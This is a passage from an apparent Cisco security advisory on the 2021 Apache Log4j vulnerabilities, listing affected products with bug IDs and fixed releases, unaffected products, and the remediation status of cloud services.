disclosed:\r\n\r\nCVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration\r\n\r\nFor a description of these vulnerabilities, see the Apache Log4j Security Vulnerabilities [\"https://logging.apache.org/log4j/2.x/security.html\"] page.\r\n\r\nCisco\u0027s Response to These Vulnerabilities\r\n\r\nCisco assessed all products and services for impact from both CVE-2021-44228 and CVE-2021-45046. 
To help detect exploitation of these vulnerabilities, Cisco has released Snort rules at the following location: Talos Rules 2021-12-21 [\"https://www.snort.org/advisories/talos-rules-2021-12-21\"]\r\n\r\nProduct fixes that are listed in this advisory will address both CVE-2021-44228 and CVE-2021-45046 unless otherwise noted.\r\n\r\nCisco has reviewed CVE-2021-45105 and CVE-2021-44832 and has determined that no Cisco products or cloud offerings are impacted by these vulnerabilities.\r\n\r\nCisco\u0027s standard practice is to update integrated third-party software components to later versions as they become available.\r\n\r\n", "title": "Summary" }, { "category": "general", "text": "Cisco investigated its product line to determine which products may be affected by these vulnerabilities.\r\n\r\nThis advisory only lists Cisco products and services that are known to include the impacted software component and thus may be vulnerable. Products and services that do not contain the impacted software component are not vulnerable and therefore are not listed in this advisory. Any Cisco product or service that is not explicitly listed in the Affected Products section of this advisory is not affected by the vulnerability or vulnerabilities described.\r\n\r\nThe Vulnerable Products [\"#vp\"] section includes Cisco bug IDs for each affected product. The bugs are accessible through the Cisco Bug Search Tool and contain additional platform-specific information, including workarounds (if available) and fixed software releases.", "title": "Affected Products" }, { "category": "general", "text": "Cisco investigated its product line to determine which products may be affected by these vulnerabilities.\r\n\r\nThe following table lists Cisco products that are affected by one or both of the vulnerabilities that are described in this advisory. 
Customers should refer to the associated Cisco bug(s) for further details.\r\n Product Cisco Bug ID Fixed Release Availability [\"https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html#fixes\"] Collaboration and Social Media Cisco Webex Meetings Server CSCwa47283 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47283\"] CWMS-3.0MR4SP3 patch (21 Dec 2021)\r\nCWMS-4.0MR4SP3 patch (21 Dec 2021)\r\nCWMS-3.0MR4SP2 patch (14 Dec 2021)\r\nCWMS-4.0MR4SP2 patch (14 Dec 2021) Endpoint Clients and Client Software Cisco CX Cloud Agent Software CSCwa47272 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47272\"] 1.12.2 (17 Dec 2021) Network Application, Service, and Acceleration Cisco Call Studio CSCwa54008 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa54008\"] 11.6(2) (23 Dec 2021)\r\n12.0(1) (23 Dec 2021)\r\n12.5(1) (23 Dec 2021)\r\n12.6(1) (23 Dec 2021) Cisco Nexus Insights CSCwa47284 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47284\"] 6.0.2 (17 Dec 2021) Network and Content Security Devices Cisco Firepower Threat Defense (FTD) managed by Firepower Device Manager (FDM) CSCwa46963 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46963\"] 6.2.3 hotfix (Available)\r\n6.4.0 hotfix (Available)\r\n6.6.5 hotfix (Available)\r\n6.7.0 hotfix (Available)\r\n7.0.1 hotfix (Available)\r\n7.1.0 hotfix (Available) Cisco Identity Services Engine (ISE) CSCwa47133 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47133\"] 2.4 hotfix (15 Dec 2021)\r\n2.6 hotfix (15 Dec 2021)\r\n2.7 hotfix (15 Dec 2021)\r\n3.0 hotfix (15 Dec 2021)\r\n3.1 hotfix (17 Dec 2021) Network Management and Provisioning Cisco Application Policy Infrastructure Controller (APIC) - Network Insights Base App CSCwa47295 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47295\"] 4.2(7r) (Available)\r\n5.2(3g) (Available) Cisco Automated Subsea Tuning CSCwa48806 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48806\"] 2.1.0.4 (22 Dec 2021) 
Cisco Business Process Automation CSCwa47269 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47269\"] 3.0.000.115 (patch) (17 Dec 2021)\r\n3.1.000.044 (patch) (17 Dec 2021)\r\n3.2.000.009 (patch) (17 Dec 2021) Cisco CloudCenter Cost Optimizer CSCwa48074 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48074\"] 5.5.2 (Available) Cisco CloudCenter Suite Admin CSCwa47349 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47349\"] 5.3.1 (Available) Cisco CloudCenter Workload Manager CSCwa47350 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47350\"] 5.5.2 (Available) Cisco CloudCenter CSCwa48832 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48832\"] 4.10.0.16 (22 Dec 2021) Cisco Common Services Platform Collector (CSPC) CSCwa47271 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47271\"] 2.10.0.1 hotfix (Available)\r\n2.9.1.3 hotfix (Available) Cisco Crosswork Data Gateway CSCwa47257 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47257\"] 2.0.2 patch (21 Dec 2021)\r\n3.0.1 patch (21 Dec 2021) Cisco Crosswork Network Controller CSCwa49936 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49936\"] 2.0.1 patch (22 Dec 2021)\r\n3.0.1 patch (22 Dec 2021) Cisco Crosswork Optimization Engine CSCwa49939 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49939\"] 2.0.1 patch (21 Dec 2021)\r\n3.0.1 patch (21 Dec 2021) Cisco Crosswork Platform Infrastructure CSCwa47367 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47367\"] 4.0.1 patch (22 Dec 2021)\r\n4.1.1 patch (22 Dec 2021) Cisco Crosswork Situation Manager CSCwa51878 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51878\"] 8.0.0.8 patch (21 Dec 2021) Cisco Crosswork Zero Touch Provisioning (ZTP) CSCwa47259 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47259\"] 2.0.1 patch (21 Dec 2021)\r\n3.0.1 patch (21 Dec 2021) Cisco Cyber Vision Sensor Management Extension CSCwa49482 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49482\"] 4.0.3 (22 Dec 2021) Cisco 
DNA Spaces Connector CSCwa47320 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47320\"] v2.0.588 (Available)\r\nv2.2.12 (Available) Cisco Data Center Network Manager (DCNM) CSCwa47291 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47291\"] 12.0(2f) (Available)\r\n11.5(3) patch (Available)\r\n11.5(2) patch (Available)\r\n11.5(1) patch (Available)\r\n11.4(1) patch (Available)\r\n11.3(1) patch (Available) Cisco Evolved Programmable Network Manager CSCwa47310 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47310\"] 5.1.3.1 patch (22 Dec 2021)\r\n5.0.2.1 patch (13 Jan 2022)\r\n4.1.1.1 patch (13 Jan 2022) Cisco Intersight Virtual Appliance CSCwa47304 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47304\"] 1.0.9-361 (20 Dec 2021) Cisco Network Services Orchestrator (NSO) CSCwa47342 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47342\"] nso-5.3.5.1 (17 Dec 2021)\r\nnso-5.4.5.2 (17 Dec 2021)\r\nnso-5.5.4.1 (17 Dec 2021)\r\nnso-5.6.3.1 (17 Dec 2021) Cisco Nexus Dashboard, formerly Cisco Application Services Engine CSCwa47299 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47299\"] 2.1.2 (23 Dec 2021) Cisco Prime Service Catalog CSCwa47347 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47347\"] 12.1 patch (20 Dec 2021) Cisco Secure Agile Exchange (SAE) Core Function Pack CSCwa52921 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa52921\"] 2.4.1 (14 Jan 2022) Cisco Smart PHY CSCwa50021 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa50021\"] 3.1.4 patch (Available)\r\n3.2.0 patch (Available)\r\n3.2.1 patch (Available)\r\n21.3 patch (21 Jan 2022) Cisco Virtual Topology System (VTS) CSCwa47334 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47334\"] 2.6.7 (22 Dec 2021) Cisco Virtualized Infrastructure Manager CSCwa49924 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49924\"] 3.2.x patch (17 Dec 2021)\r\n3.4.4 patch (17 Dec 2021)\r\n3.4.6 patch (17 Dec 2021)\r\n4.2.0 patch (17 Dec 2021)\r\n4.2.1 patch (17 Dec 
2021) Cisco WAN Automation Engine (WAE) CSCwa47369 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47369\"] 7.5.0.1 (22 Dec 2021)\r\n7.4.0.1 (28 Jan 2022)\r\n7.3.0.2 (28 Jan 2022) Routing and Switching - Enterprise and Service Provider Cisco DNA Center CSCwa47322 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47322\"] 2.2.2.8 patch (Available)\r\n2.1.2.8 patch (Available)\r\n2.2.3.4 patch (Available) Cisco IOx Fog Director CSCwa47370 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47370\"] 1.14.5 patch (16 Dec 2021)\r\n1.16.4 patch (Available) Cisco Network Assurance Engine CSCwa47285 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47285\"] 6.0.2 (23 Dec 2021) Cisco Network Convergence System 1004 CSCwa52235 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa52235\"] 7.3.2 SMU/GISO (14 Jan 2022)\r\n7.3.1 SMU (21 Jan 2022) Cisco Optical Network Controller CSCwa48793 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48793\"] 1.1.0 (22 Dec 2021) Cisco SD-WAN vManage CSCwa47745 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47745\"] 20.3.4.1 (Available)\r\n20.6.2.1 (Available)\r\n20.5.1.1 (Available)\r\n20.4.2.1 (Available) Unified Computing Cisco Integrated Management Controller (IMC) Supervisor CSCwa47307 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47307\"] 2.3.2.1 (23 Dec 2021) Cisco UCS Central Software CSCwa47303 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47303\"] 2.0(1p) (22 Dec 2021) Cisco UCS Director CSCwa47288 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47288\"] 6.8.2.0 (23 Dec 2021) Cisco Workload Optimization Manager CSCwa50220 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa50220\"] 3.2.1 patch (Available) Voice and Unified Communications Devices Cisco BroadWorks CSCwa47315 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47315\"] 2021.11_1.162 (13 Dec 2021)\r\nap381882 (15 Dec 2021) Cisco Cloud Connect CSCwa51545 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51545\"] 
12.6(1) (Available) Cisco Contact Center Domain Manager (CCDM) CSCwa47383 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47383\"] 12.5(1) ES6 (Available)\r\n12.6(1) ES3 (Available) Cisco Contact Center Management Portal (CCMP) CSCwa47383 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47383\"] 12.5(1) ES6 (Available)\r\n12.6(1) ES3 (Available) Cisco Emergency Responder CSCwa47391 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47391\"] 11.5(4)SU9 patch (16 Dec 2021)\r\n11.5(4)SU10 patch (16 Dec 2021) Cisco Enterprise Chat and Email CSCwa47392 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47392\"] 12.0(1) patch (Available)\r\n12.5 (1) patch (Available)\r\n12.6(1) patch (Available) Cisco Finesse CSCwa46459 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46459\"] 12.6(1)ES03 (23 Dec 2021) Cisco Packaged Contact Center Enterprise CSCwa47274 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47274\"] 11.6(2) (Available)\r\n12.0(1) (Available)\r\n12.5(1) (Available)\r\n12.6(1) (Available) Cisco Paging Server CSCwa47395 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47395\"] 14.4.2 (21 Dec 2021) Cisco Unified Communications Manager / Cisco Unified Communications Manager Session Management Edition CSCwa47249 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47249\"] 11.5(1)SU7 patch (16 Dec 2021)\r\n11.5(1)SU8 patch (16 Dec 2021)\r\n11.5(1)SU9 patch (16 Dec 2021)\r\n11.5(1)SU10 patch (16 Dec 2021)\r\n11.5(1.18119-2) through 11.5(1.23162-1) patch (16 Dec 2021) Cisco Unified Communications Manager IM \u0026Presence Service CSCwa47393 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47393\"] 11.5(1)SU7 patch (16 Dec 2021)\r\n11.5(1)SU8 patch (16 Dec 2021)\r\n11.5(1)SU9 patch (16 Dec 2021)\r\n11.5(1)SU10 patch (16 Dec 2021)\r\n11.5(1.18900-16) patch (16 Dec 2021)\r\n11.5(1.18901-3) patch (16 Dec 2021) Cisco Unified Contact Center Enterprise - Live Data server CSCwa46810 
[\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46810\"] 11.6(1)ES23 (23 Dec 2021)\r\n12.0(1)ES18 (23 Dec 2021)\r\n12.5(1)ES13 (23 Dec 2021)\r\n12.6(1)ES03 (23 Dec 2021) Cisco Unified Contact Center Enterprise CSCwa47273 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47273\"] 11.6(2) (Available)\r\n12.0(1) (Available)\r\n12.5(1) (Available)\r\n12.6(1) (Available) Cisco Unified Contact Center Express CSCwa47388 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47388\"] 12.5(1)SU1 (23 Dec 2021) Cisco Unified Customer Voice Portal CSCwa47275 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47275\"] 11.6(2) (Available)\r\n12.0(1) (Available)\r\n12.5(1) (Available)\r\n12.6(1) (23 Dec 2021) Cisco Unified Intelligence Center CSCwa46525 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46525\"] 12.6(1) (23 Dec 2021) Cisco Unified SIP Proxy Software CSCwa47265 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47265\"] 10.2.1v2 patch (23 Dec 2021) Cisco Unity Connection CSCwa47387 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47387\"] 11.5(1)SU7 patch (16 Dec 2021)\r\n11.5(1)SU8 patch (16 Dec 2021)\r\n11.5(1)SU9 patch (16 Dec 2021)\r\n11.5(1)SU10 patch (16 Dec 2021)\r\n11.5(1.18119-2) through 11.5(1.23162-1) patch (16 Dec 2021) Cisco Virtualized Voice Browser CSCwa47397 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47397\"] 12.5(1) (Available)\r\n12.6(1) (23 Dec 2021) Cisco Webex Workforce Optimization CSCwa51476 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51476\"] Product is End of Software Maintenance - No Fixes Planned Video, Streaming, TelePresence, and Transcoding Devices Cisco Video Surveillance Operations Manager CSCwa47360 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47360\"] 7.14.4 patch (Available) Cisco Vision Dynamic Signage Director CSCwa47351 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47351\"] Contact Cisco TAC for a patch\r\n6.4 SP3 (17 Jan 2021) Wireless Cisco Connected Mobile 
Experiences (CMX) CSCwa47312 [\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47312\"] 10.6.3-70 patch (Available)\r\n10.6.3-105 patch (Available)\r\n10.6.2-89 patch (Available)\r\n10.4.1 patch (Available)", "title": "Vulnerable Products" }, { "category": "general", "text": "Cisco investigated its product line to determine which products may be affected by these vulnerabilities.\r\n\r\nAny product not listed in the Products Under Investigation or Vulnerable Products section of this advisory is to be considered not vulnerable.\r\n\r\nCisco has confirmed that these vulnerabilities do not affect the following Cisco products:\r\n\r\nCable Devices\r\n\r\nCisco GS7000 Nodes\r\nCisco RF Gateway Series\r\nCisco Remote PHY 120\r\n\r\nCollaboration and Social Media\r\n\r\nCisco SocialMiner\r\n\r\nEndpoint Clients and Client Software\r\n\r\nCisco AnyConnect Secure Mobility Client\r\nCisco Jabber Guest\r\nCisco Jabber\r\nCisco Secure Endpoint, formerly Cisco Advanced Malware Protection for Endpoints\r\nCisco Webex App\r\n\r\nMeraki Products\r\n\r\nCisco Meraki Go Series\r\nCisco Meraki MR Series Cloud-Managed Wireless Access Points\r\nCisco Meraki MS Series Switches\r\nCisco Meraki MT Series Sensors\r\nCisco Meraki MV Series Cloud-Managed Smart Cameras\r\nCisco Meraki MX Series Cloud-Managed Security and SD-WAN\r\nCisco Meraki Systems Manager (SM)\r\nCisco Meraki Z-Series Cloud-Managed Teleworker Gateway\r\n\r\nNetwork Application, Service, and Acceleration\r\n\r\nCisco Cloud Services Platform 2100\r\nCisco Cloud Services Platform 5000 Series\r\nCisco Nexus Dashboard Data Broker\r\nCisco Tetration Analytics\r\nCisco Wide Area Application Services (WAAS)\r\nConfD\r\n\r\nNetwork and Content Security Devices\r\n\r\nCisco AMP Virtual Private Cloud Appliance\r\nCisco Adaptive Security Appliance (ASA) Software\r\nCisco Adaptive Security Device Manager\r\nCisco Adaptive Security Virtual Appliance (ASAv)\r\nCisco Advanced Web Security Reporting Application\r\nCisco Email Security 
Appliance (ESA)\r\nCisco FXOS Firepower Chassis Manager\r\nCisco Firepower Management Center\r\nCisco Firepower Next-Generation Intrusion Prevention System (NGIPS)\r\nCisco Firepower Threat Defense (FTD) managed by Cisco Firepower Management Center\r\nCisco Secure Email Encryption Add-in\r\nCisco Secure Email Encryption Plugin for Outlook\r\nCisco Secure Email Security Plugin for Outlook\r\nCisco Secure Email and Web Manager, formerly Cisco Content Security Management Appliance (SMA)\r\nCisco Secure Network Analytics, formerly Stealthwatch Enterprise, Advanced Host Group Automation (AHGA)\r\nCisco Secure Network Analytics, formerly Stealthwatch Enterprise, Flow Adapter\r\nCisco Secure Network Analytics, formerly Stealthwatch Enterprise, Network Forensics Automation (NFA)\r\nCisco Secure Network Analytics, formerly Stealthwatch Enterprise, Proxy Adapter\r\nCisco Secure Network Analytics, formerly Stealthwatch\r\nCisco Secure Services Proxy (CSSP)\r\nCisco Security Malware Analytics Appliance, formerly Cisco Threat Grid Appliance\r\nCisco Security Manager\r\nCisco Web Security Appliance (WSA)\r\n\r\nNetwork Management and Provisioning\r\n\r\nCisco ACI Multi-Site Orchestrator\r\nCisco CloudCenter Action Orchestrator\r\nCisco Connected Grid Device Manager\r\nCisco Container Platform\r\nCisco Crosswork Change Automation\r\nCisco Crosswork Health Insights\r\nCisco Crosswork Service Health\r\nCisco Elastic Services Controller (ESC)\r\nCisco Intelligent Node (iNode) Manager\r\nCisco Intersight Mobile App\r\nCisco IoT Field Network Director, formerly Cisco Connected Grid Network Management System\r\nCisco Modeling Labs\r\nCisco NCS 2000 Shelf Virtualization Orchestrator\r\nCisco Optical Network Planner\r\nCisco Policy Suite\r\nCisco Prime Access Registrar\r\nCisco Prime Cable Provisioning\r\nCisco Prime Central for Service Providers\r\nCisco Prime Collaboration Assurance\r\nCisco Prime Collaboration Deployment\r\nCisco Prime Collaboration Provisioning\r\nCisco Prime IP 
Express\r\nCisco Prime Infrastructure\r\nCisco Prime License Manager\r\nCisco Prime Network Registrar\r\nCisco Prime Network\r\nCisco Prime Optical for Service Providers\r\nCisco Prime Performance Manager\r\nCisco Prime Provisioning\r\nCisco Process Orchestrator\r\nCisco Smart Software Manager On-Prem\r\nCisco Telemetry Broker\r\n\r\nRouting and Switching - Enterprise and Service Provider\r\n\r\nCisco ACI Virtual Edge\r\nCisco ASR 5000 Series Routers\r\nCisco Application Policy Infrastructure Controller Enterprise Module (APIC-EM)\r\nCisco Enterprise NFV Infrastructure Software (NFVIS)\r\nCisco GGSN Gateway GPRS Support Node\r\nCisco IOS XR Software\r\nCisco IOS and IOS XE Software\r\nCisco IP Services Gateway (IPSG)\r\nCisco MDS 9000 Series Multilayer Switches\r\nCisco MME Mobility Management Entity\r\nCisco Mobility Unified Reporting and Analytics System\r\nCisco Network Convergence System 2000 Series\r\nCisco Nexus 3000 Series Switches\r\nCisco Nexus 5500 Platform Switches\r\nCisco Nexus 5600 Platform Switches\r\nCisco Nexus 6000 Series Switches\r\nCisco Nexus 7000 Series Switches\r\nCisco Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode\r\nCisco Nexus 9000 Series Switches in standalone NX-OS mode\r\nCisco ONS 15454 Series Multiservice Provisioning Platforms\r\nCisco PDSN/HA Packet Data Serving Node and Home Agent\r\nCisco PGW Packet Data Network Gateway\r\nCisco SD-WAN vBond Controller Software\r\nCisco SD-WAN vEdge 100 Series Routers\r\nCisco SD-WAN vEdge 1000 Series Routers\r\nCisco SD-WAN vEdge 2000 Series Routers\r\nCisco SD-WAN vEdge 5000 Series Routers\r\nCisco SD-WAN vEdge Cloud Router Platform\r\nCisco SD-WAN vSmart Controller Software\r\nCisco System Architecture Evolution Gateway (SAEGW)\r\nCisco Ultra Cloud Core - Access and Mobility Management Function\r\nCisco Ultra Cloud Core - Policy Control Function\r\nCisco Ultra Cloud Core - Redundancy Configuration Manager\r\nCisco Ultra Cloud Core - Session Management 
Function\r\nCisco Ultra Cloud Core - Subscriber Microservices Infrastructure\r\nCisco Ultra Packet Core\r\nCisco Ultra Services Platform\r\n\r\nRouting and Switching - Small Business\r\n\r\nCisco 220 Series Smart Plus Switches\r\nCisco 250 Series Smart Switches\r\nCisco 350 Series Managed Switches\r\nCisco 550 Series Stackable Managed Switches\r\nCisco Business 220 Series Smart Switches\r\nCisco Business 250 Series Smart Switches\r\nCisco Business 350 Series Managed Switches\r\nCisco Business Dashboard\r\nCisco RV110W Wireless-N VPN Firewall\r\nCisco RV130 VPN Router\r\nCisco RV130W Wireless-N Multifunction VPN Router\r\nCisco RV132W ADSL2+ Wireless-N VPN Router\r\nCisco RV134W VDSL2 Wireless-AC VPN Router\r\nCisco RV160 VPN Router\r\nCisco RV160W Wireless-AC VPN Router\r\nCisco RV215W Wireless-N VPN Router\r\nCisco RV260 VPN Routers\r\nCisco RV260P VPN Router with PoE\r\nCisco RV260W Wireless-AC VPN Router\r\nCisco RV320 Dual Gigabit WAN VPN Router\r\nCisco RV325 Dual Gigabit WAN VPN Router\r\nCisco RV340 Dual WAN Gigabit VPN Router\r\nCisco RV340W Dual WAN Gigabit Wireless-AC VPN Router\r\nCisco RV345 Dual WAN Gigabit VPN Router\r\nCisco RV345P Dual WAN Gigabit POE VPN Router\r\nCisco Small Business 200 Series Smart Switches\r\nCisco Small Business 300 Series Managed Switches\r\nCisco Small Business 500 Series Stackable Managed Switches\r\nCisco WAP125 Wireless-AC Dual Band Desktop Access Point with PoE\r\nCisco WAP150 Wireless-AC/N Dual Radio Access Point with PoE\r\nCisco WAP361 Wireless-AC/N Dual Radio Wall Plate Access Point with PoE\r\nCisco WAP371 Wireless-AC/N Radio Access Point with Single Point Setup\r\nCisco WAP571 Wireless-AC/N Premium Dual Radio Access Point with PoE\r\nCisco WAP571E Wireless-AC/N Premium Dual Radio Outdoor Access Point\r\nCisco WAP581 Wireless-AC Dual Radio Wave 2 Access Point with 2.5GbE LAN\r\n\r\nUnified Computing\r\n\r\nCisco 5000 Series Enterprise Network Compute System (ENCS)\r\nCisco HyperFlex System\r\nCisco Hyperflex Storage 
Replication Adapter\r\nCisco UCS C-Series Rack Servers and S-Series Storage Servers - Integrated Management Controller (CIMC)\r\nCisco UCS E-Series Servers\r\nCisco UCS Manager\r\n\r\nVoice and Unified Communications Devices\r\n\r\nCisco Headset 500 and 700 Series\r\nCisco Hosted Collaboration Mediation Fulfillment\r\nCisco IP Phones with Multiplatform Firmware\r\nCisco IP Phones\r\nCisco TelePresence Endpoints\r\nCisco Unified Attendant Console Advanced\r\nCisco Unified Attendant Console Business Edition\r\nCisco Unified Attendant Console Department Edition\r\nCisco Unified Attendant Console Enterprise Edition\r\nCisco Unified Attendant Console Premium Edition\r\nCisco Unified Communications Domain Manager\r\nCisco Unity Express\r\nCisco Webex Devices\r\nCisco Webex Hybrid Data Security Node\r\nCisco Webex Video Mesh\r\n\r\nVideo, Streaming, TelePresence, and Transcoding Devices\r\n\r\nCisco Expressway Series\r\nCisco Meeting Management (CMM)\r\nCisco Meeting Server\r\nCisco TelePresence Management Suite\r\nCisco TelePresence Video Communication Server (VCS)\r\nCisco Video Surveillance Media Server\r\n\r\nWireless\r\n\r\nCisco AireOS Wireless LAN Controllers\r\nCisco Aironet Access Points\r\nCisco Business 100 and 200 Series Access Points\r\nCisco Business Wireless\r\nCisco Catalyst 9100 Series Access Points\r\nCisco Catalyst 9800 Series Wireless Controllers\r\nCisco IOS Access Points\r\nCisco Mobility Services Engine\r\nCisco Ultra-Reliable Wireless Backhaul\r\n Cisco Cloud Offerings\r\nCisco investigated its cloud offerings to determine which products may be affected by these vulnerabilities. 
The following table lists Cisco cloud offerings that were part of this investigation.\r\n\r\n Product CVE-2021-44228 CVE-2021-45046 AppDynamics Remediated - service-specific details [\"https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability\"] Remediated - service-specific details [\"https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability\"] AppDynamics with Cisco Secure Application Remediated - service-specific details [\"https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability\"] Remediated - service-specific details [\"https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability\"] Cisco Cloud Email Security Not vulnerable Not vulnerable Cisco Cloudlock Remediated Remediated Cisco Cloudlock for Government Remediated Remediated Cisco Cognitive Intelligence Not vulnerable Not vulnerable Cisco Collaboration Experience Service (CES) Not vulnerable Not vulnerable Cisco Collaboration Experience Service Management (CESM) Not vulnerable Not vulnerable Cisco Crosswork Cloud Not vulnerable Not vulnerable Cisco CX Cloud Remediated Remediated Cisco Defense Orchestrator Not vulnerable Not vulnerable Cisco DNA Spaces Remediated Remediated Cisco Intersight Remediated Remediated Cisco IoT Control Center Remediated Remediated Cisco IoT Operations Dashboard Remediated Remediated Cisco Kinetic for Cities Remediated Remediated Cisco Kinetic Gateway Management Module Remediated Remediated Cisco Managed Services Accelerator (MSX) Remediated Remediated Cisco Placetel Not vulnerable Not vulnerable Cisco PX Cloud Remediated Remediated Cisco SD-WAN Cloud Remediated Remediated Cisco SD-WAN vAnalytics Not vulnerable Not vulnerable Cisco Secure Application (integrated with AppDynamics) Not vulnerable [\"https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability\"] Not vulnerable 
[\"https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability\"] Cisco Secure Cloud Analytics, formerly Cisco Stealthwatch Cloud Not vulnerable Not vulnerable Cisco Secure Cloud Insights Not vulnerable Not vulnerable Cisco Secure Email Cloud Mailbox, formerly Cisco Cloud Mailbox Defense Not vulnerable Not vulnerable Cisco Secure Email Encryption Service, formerly Cisco Registered Envelope Service Not vulnerable Not vulnerable Cisco Secure Endpoint, formerly Cisco Advanced Malware Protection for Endpoints Not vulnerable Not vulnerable Cisco Secure Malware Analytics, formerly Cisco Threat Grid Not vulnerable Not vulnerable Cisco SecureX Not vulnerable Not vulnerable Cisco ServiceGrid Not vulnerable Not vulnerable Cisco Smart Net Total Care Remediated Remediated Cisco Umbrella DNS Remediated Remediated Cisco Umbrella SIG Remediated Remediated Cisco Unified Communications Management Cloud - UC Management Remediated Remediated Cisco Unified Communications Manager Cloud Commercial Remediated Remediated Cisco Unified Communications Manager Cloud for Government Remediated Remediated Cisco Webex Calling Remediated Remediated Cisco Webex Calling Carrier Remediated Remediated Cisco Webex Cloud Registered Endpoints Not vulnerable Not vulnerable Cisco Webex Cloud-Connected UC Remediated Remediated Cisco Webex Contact Center Remediated Remediated Cisco Webex Contact Center Enterprise Remediated Remediated Cisco Webex Control Hub Remediated Remediated Cisco Webex Experience Management Not vulnerable Not vulnerable Cisco Webex FedRAMP Remediated Remediated Cisco Webex for Government FedRAMP Remediated Remediated Cisco Webex Meetings Remediated Remediated Cisco Webex Meetings Slow Channel Remediated Remediated Cisco Webex Messaging Remediated Remediated Cisco Webex Site Admin webpage Remediated Remediated Duo Security Remediated Remediated Duo Security for Government Remediated Remediated eSIM Flex Remediated Remediated IMIassist Not vulnerable Not 
